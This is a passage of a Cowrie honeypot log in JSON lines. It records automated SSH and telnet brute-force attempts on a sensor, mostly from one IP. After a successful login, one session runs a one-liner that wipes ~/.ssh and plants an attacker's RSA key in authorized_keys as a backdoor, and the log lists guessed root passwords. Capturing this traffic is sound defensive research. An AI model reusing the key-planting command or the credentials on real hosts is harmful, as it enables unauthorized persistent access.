dsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:52:54.961135Z","src_ip":"212.227.235.229","session":"5f5b2a81296e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:55.505445Z","src_ip":"212.227.235.229","session":"5f5b2a81296e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:56.633099Z","src_ip":"212.227.235.229","session":"5f5b2a81296e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47408,"dst_ip":"1.2.3.4","dst_port":22,"session":"05a651d20863","protocol":"ssh","message":"New connection: 212.227.235.229:47408 (1.2.3.4:22) [session: 05a651d20863]","sensor":"my-vps","timestamp":"2025-08-26T04:52:56.753403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:52:56.754724Z","src_ip":"212.227.235.229","session":"05a651d20863"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:52:56.878411Z","src_ip":"212.227.235.229","session":"05a651d20863"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:52:57.412323Z","src_ip":"212.227.235.229","session":"05a651d20863"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:57.536556Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:57.538183Z","src_ip":"212.227.235.229","session":"05a651d20863"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39040,"dst_ip":"1.2.3.4","dst_port":23,"session":"81736cbe9f23","protocol":"telnet","message":"New connection: 212.227.235.229:39040 (1.2.3.4:23) [session: 81736cbe9f23]","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.287190Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.288882Z","src_ip":"212.227.235.229","session":"81736cbe9f23"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.290505Z","src_ip":"212.227.235.229","session":"81736cbe9f23"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.291944Z","src_ip":"212.227.235.229","session":"81736cbe9f23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43020,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b6b6c6bc6f3","protocol":"ssh","message":"New connection: 212.227.235.229:43020 (1.2.3.4:22) [session: 0b6b6c6bc6f3]","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.380406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.381240Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.454730Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.session.closed","duration":0.18526721000671387,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.472351Z","src_ip":"212.227.235.229","session":"81736cbe9f23"}
{"eventid":"cowrie.login.success","username":"root","password":"ASDF1234!@#$","message":"login attempt [root/ASDF1234!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.787416Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:58.984146Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.984962Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:52:58.986214Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:59.059596Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:59.223093Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:52:59.223870Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:52:59.298383Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:59.299391Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43024,"dst_ip":"1.2.3.4","dst_port":22,"session":"49515a7bb899","protocol":"ssh","message":"New connection: 212.227.235.229:43024 (1.2.3.4:22) [session: 49515a7bb899]","sensor":"my-vps","timestamp":"2025-08-26T04:52:59.373052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:52:59.374023Z","src_ip":"212.227.235.229","session":"49515a7bb899"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:52:59.449373Z","src_ip":"212.227.235.229","session":"49515a7bb899"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:59.793143Z","src_ip":"212.227.235.229","session":"49515a7bb899"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:53:00.872195Z","src_ip":"212.227.235.229","session":"49515a7bb899"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43038,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff33f3306d0c","protocol":"ssh","message":"New connection: 212.227.235.229:43038 (1.2.3.4:22) [session: ff33f3306d0c]","sensor":"my-vps","timestamp":"2025-08-26T04:53:00.943846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:53:00.944758Z","src_ip":"212.227.235.229","session":"ff33f3306d0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:53:01.017081Z","src_ip":"212.227.235.229","session":"ff33f3306d0c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:53:01.348440Z","src_ip":"212.227.235.229","session":"ff33f3306d0c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:53:01.422957Z","src_ip":"212.227.235.229","session":"0b6b6c6bc6f3"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:53:01.423973Z","src_ip":"212.227.235.229","session":"ff33f3306d0c"}
{"eventid":"cowrie.session.closed","duration":31.528144359588623,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:53:04.516379Z","src_ip":"212.227.235.229","session":"b5be4a6a988e"}
{"eventid":"cowrie.session.closed","duration":13.050057411193848,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:53:06.593086Z","src_ip":"49.216.120.71","session":"8a3a0d436732"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33502,"dst_ip":"1.2.3.4","dst_port":22,"session":"d20ae2cb9cd8","protocol":"ssh","message":"New connection: 212.227.235.229:33502 (1.2.3.4:22) [session: d20ae2cb9cd8]","sensor":"my-vps","timestamp":"2025-08-26T04:53:35.943441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:53:35.944448Z","src_ip":"212.227.235.229","session":"d20ae2cb9cd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:53:36.212991Z","src_ip":"212.227.235.229","session":"d20ae2cb9cd8"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwe123","message":"login attempt [user/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:53:37.329875Z","src_ip":"212.227.235.229","session":"d20ae2cb9cd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41338,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdf6a15fe1e4","protocol":"ssh","message":"New connection: 212.227.235.229:41338 (1.2.3.4:22) [session: cdf6a15fe1e4]","sensor":"my-vps","timestamp":"2025-08-26T04:53:37.637161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:53:37.638804Z","src_ip":"212.227.235.229","session":"cdf6a15fe1e4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:53:38.601085Z","src_ip":"212.227.235.229","session":"d20ae2cb9cd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43374,"dst_ip":"1.2.3.4","dst_port":23,"session":"4a94b54f1f06","protocol":"telnet","message":"New connection: 212.227.125.160:43374 (1.2.3.4:23) [session: 4a94b54f1f06]","sensor":"my-vps","timestamp":"2025-08-26T04:53:46.310732Z"}
{"eventid":"cowrie.session.closed","duration":0.0012416839599609375,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:53:46.311860Z","src_ip":"212.227.125.160","session":"4a94b54f1f06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:53:49.049366Z","src_ip":"212.227.235.229","session":"cdf6a15fe1e4"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:53:49.051154Z","src_ip":"212.227.235.229","session":"cdf6a15fe1e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40996,"dst_ip":"1.2.3.4","dst_port":22,"session":"c071be6f9fcf","protocol":"ssh","message":"New connection: 212.227.235.229:40996 (1.2.3.4:22) [session: c071be6f9fcf]","sensor":"my-vps","timestamp":"2025-08-26T04:54:00.310701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:54:00.311628Z","src_ip":"212.227.235.229","session":"c071be6f9fcf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:54:00.384810Z","src_ip":"212.227.235.229","session":"c071be6f9fcf"}
{"eventid":"cowrie.login.failed","username":"mourad","password":"mourad","message":"login attempt [mourad/mourad] failed","sensor":"my-vps","timestamp":"2025-08-26T04:54:00.715917Z","src_ip":"212.227.235.229","session":"c071be6f9fcf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:54:01.791762Z","src_ip":"212.227.235.229","session":"c071be6f9fcf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36262,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c06705cb880","protocol":"telnet","message":"New connection: 212.227.235.229:36262 (1.2.3.4:23) [session: 8c06705cb880]","sensor":"my-vps","timestamp":"2025-08-26T04:54:07.153037Z"}
{"eventid":"cowrie.session.closed","duration":0.0012493133544921875,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:54:07.154194Z","src_ip":"212.227.235.229","session":"8c06705cb880"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:54:21.031830Z","src_ip":"212.227.235.229","session":"6110ceb87c2a"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":52000,"dst_ip":"1.2.3.4","dst_port":22,"session":"60dc9e990c13","protocol":"ssh","message":"New connection: 93.123.109.181:52000 (1.2.3.4:22) [session: 60dc9e990c13]","sensor":"my-vps","timestamp":"2025-08-26T04:54:47.701302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:54:47.701847Z","src_ip":"93.123.109.181","session":"60dc9e990c13"}
